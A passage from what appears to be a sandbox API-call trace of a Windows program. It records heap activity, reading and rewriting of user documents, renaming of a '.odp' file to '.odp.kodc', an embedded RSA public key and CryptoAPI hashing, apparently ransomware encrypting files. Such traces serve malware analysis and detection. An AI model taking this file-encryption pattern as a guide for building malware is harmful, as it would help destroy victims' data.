Flags=0x0, Size=0x156a0) returned 0x9ba4d90 [0098.233] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x69d4a8 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8c8 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x69d4f0 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8e0 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a910 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a928 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.233] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a910 | out: hHeap=0x630000) returned 1 [0098.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a928 | out: hHeap=0x630000) returned 1 [0098.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.233] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a928 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a910 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.234] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a928 | out: hHeap=0x630000) returned 1 [0098.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a910 | out: hHeap=0x630000) returned 1 [0098.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.234] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.235] GetCurrentThreadId () returned 0x42c [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8e788 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.235] GetCurrentThreadId () returned 0x42c [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.235] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.235] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a910 [0098.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a928 [0098.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8f8 [0098.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a940 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a910 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a910 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a910 | out: hHeap=0x630000) returned 1 [0098.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.238] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a940 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a928 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8f8 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.238] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8e0 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69d4f0 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.239] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x15697, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x15697, lpOverlapped=0x0) returned 1 [0098.239] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.239] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1569c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.240] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.240] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.240] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.240] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.240] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.240] CloseHandle (hObject=0x5cc) returned 1 [0098.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.242] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKkQF0XTG.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkkqf0xtg.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKkQF0XTG.odp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkkqf0xtg.odp.kodc")) returned 1 [0098.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.243] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.244] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f28ac20, ftCreationTime.dwHighDateTime=0x1d5b642, ftLastAccessTime.dwLowDateTime=0x349c67a0, ftLastAccessTime.dwHighDateTime=0x1d5bf72, ftLastWriteTime.dwLowDateTime=0x349c67a0, ftLastWriteTime.dwHighDateTime=0x1d5bf72, nFileSizeHigh=0x0, nFileSizeLow=0x1539, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eX G.odp", cAlternateFileName="EXG~1.ODP")) returned 1 [0098.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.244] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eX G.odp") returned=".odp" [0098.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eX G.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ex g.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.245] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=5433) returned 1 [0098.245] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.248] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1513, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.248] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.249] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.249] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1539, lpOverlapped=0x0) returned 1 [0098.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.249] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.250] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.250] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.250] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.250] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.250] GetLastError () returned 0x0 [0098.251] CryptDestroyHash 